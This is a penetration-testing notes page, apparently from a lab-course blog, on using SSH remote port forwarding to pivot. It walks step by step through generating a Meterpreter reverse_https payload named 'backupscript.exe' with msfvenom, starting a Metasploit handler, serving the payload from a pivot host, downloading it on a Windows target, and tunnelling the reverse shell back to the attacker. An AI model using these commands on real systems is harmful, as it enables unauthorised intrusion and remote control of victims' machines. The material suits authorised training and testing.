Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

SSH Remote/Reverse Port Forwarding

Remote port forwarding allows a target with no route back to your attack host to connect through a pivot host. Essential for reverse shells when the target can only reach internal networks.

Syntax

ssh -R <bind_address>:<bind_port>:<forward_host>:<forward_port> user@pivot_host -vN
ParameterDescription
bind_addressInterface on pivot host to listen on
bind_portPort on pivot host to listen on
forward_hostWhere to forward connections (usually 0.0.0.0 for your listener)
forward_portPort on your attack host (your listener)
-vVerbose mode (shows connection logs)
-NNo shell prompt (forwarding only)

The Problem

Attack Host (10.10.15.x)
    │
    │ SSH ✓
    ▼
Pivot Host (10.129.x.x / 172.16.5.129)
    │
    │ RDP ✓
    ▼
Windows Target (172.16.5.19)
    │
    ✗ No route to Attack Host

The Windows target cannot initiate connections back to the attack host.

The Solution

Forward a port on the pivot host back to your listener:

ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.202.64 -vN

This makes the pivot host listen on 172.16.5.129:8080 and forward all connections to your attack host on port 8000.

Step-by-Step Instructions

Step 1: Create Payload Pointing to Pivot Host

msfvenom -p windows/x64/meterpreter/reverse_https \
  lhost=172.16.5.129 \
  lport=8080 \
  -f exe -o backupscript.exe

Note: lhost is the pivot host IP (reachable by target), not your attack host.

Step 2: Start Metasploit Listener

msfconsole

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_https
msf6 > set lhost 0.0.0.0
msf6 > set lport 8000
msf6 > run

Step 3: Transfer Payload to Pivot Host

scp backupscript.exe ubuntu@10.129.202.64:~/

Step 4: Serve Payload from Pivot Host

On pivot host:

python3 -m http.server 8123

Step 5: Download Payload on Target

On Windows target:

Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

Step 6: Create Remote Port Forward

ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.202.64 -vN

Flags:

  • -R - Remote port forward
  • -v - Verbose (see connection logs)
  • -N - No shell prompt (just forwarding)

Step 7: Execute Payload

Run backupscript.exe on Windows target.

Step 8: Receive Shell

Connection flow:

Windows (172.16.5.19) → Pivot:8080 → SSH tunnel → Attack Host:8000

Meterpreter shows connection from 127.0.0.1 (local SSH socket).

Verifying the Forward

The -v flag shows connection logs:

debug1: client_request_forwarded_tcpip: listen 172.16.5.129 port 8080, originator 172.16.5.19 port 61355
debug1: channel 1: connected to 0.0.0.0 port 8000

When to Use

  • Target has no route to attack host
  • Need reverse shell through pivot
  • RDP clipboard disabled (need file transfer)
  • Running exploits requiring Meterpreter session
  • Enumeration requiring low-level Windows API access